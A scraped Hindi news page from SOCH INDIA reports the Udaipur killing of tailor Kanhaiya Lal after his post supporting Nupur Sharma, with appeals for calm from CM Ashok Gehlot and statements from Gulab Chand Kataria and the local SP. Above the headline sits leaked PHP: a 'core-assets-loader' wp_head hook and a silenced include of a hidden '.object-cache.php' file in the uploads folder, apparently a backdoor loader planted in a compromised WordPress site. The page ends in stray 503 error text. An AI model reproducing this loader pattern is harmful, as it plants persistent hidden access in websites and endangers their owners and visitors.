add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); Udaipur Murder Case: नूपुर शर्मा के समर्थन में स्टेटस लगाने पर शख्स की दुकान में घुसकर हत्या, सीएम गहलोत ने की शांति की अपील – SOCH INDIA
Menu

देश
Udaipur Murder Case: नूपुर शर्मा के समर्थन में स्टेटस लगाने पर शख्स की दुकान में घुसकर हत्या, सीएम गहलोत ने की शांति की अपील

nobanner

राजस्थान के उदयपुर में नूपुर शर्मा के समर्थन में सोशल मीडिया स्टेटस लगाने पर एक व्यक्ति की निर्मम हत्या कर दी गई. ये वारदात उदयपुर के धानमंडी थाना क्षेत्र में हुई. मृतक कन्हैया लाल टेलरिंग की दुकान चलाते थे. हत्यारे उनकी दुकान पर कपड़े सिलवाने के बहाने आए और उसकी हत्या कर दी. इतना ही नहीं उन्होंने पूरी वारदात का वीडियो भी बनाया और उसे वायरल कर दिया. इस मामले पर सीएम अशोक गहलोत ने सभी लोगों से शांति बनाए रखने की अपील की है.

आरोपियों को मिलेगी सजा- सीएम गहलोत
मुख्यमंत्री अशोक गहलोत ने कहा, “उदयपुर में युवक की जघन्य हत्या की भर्त्सना करता हूं. इस घटना में शामिल सभी अपराधियों कठोर कार्रवाई की जाएगी एवं पुलिस अपराध की पूरी तह तक जाएगी. मैं सभी पक्षों से शान्ति बनाए रखने की अपील करता हूं. ऐसे जघन्य अपराध में लिप्त हर व्यक्ति को कड़ी से कड़ी सजा दिलाई जाएगी.”

‘शेयर न करें वीडियो’
इसके अलावा सीएम गहलोत ने जनता से हत्या की वीडियो को शेयर न करने की भी अपील की. उन्होंने कहा, “मैं सभी से अपील करता हूं कि इस घटना का वीडियो शेयर कर माहौल खराब करने का प्रयास ना करें. वीडियो शेयर करने से अपराधी का समाज में घृणा फैलाने का उद्देश्य सफल होगा.”

आरोपियों को मिले सख्त सजा-कटारिया
वहीं इस मामले पर बीजेपी नेता और विधानसभा में नेता प्रतिपक्ष गुलाब चंद कटारिया ने कहा कि उदयपुर में हृदय विदारक घटना हुई है. इसके पीछे कोई गैंग है. मेरी सीएम से बात हुई. इन लोगों को सख्त से सख्त सजा मिलनी चाहिए. कटारिया ने आगे कहा कि मेरी एसपी और कलेक्टर के अलावा वहां की जनता से बात भी बात हुई है.

मौके पर पुलिस बल तैनात- एसपी
उदयपुर में हुई इस घटना को लेकर जिले के एसपी मनोज कुमार ने कहा कि नृशंस हत्या की जैसे ही हमें सूचना मिली पुलिस को तैनात कर दिया गया है. अपराधियों के खिलाफ सख्त कार्रवाई की जाएगी. कुछ आरोपियों की पहचान हुई है, हमने टीमें भेजी हैं. सोशल मीडिया पर जो वीडियो वायरल हो रहा है उसे भी हमने देखा है.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.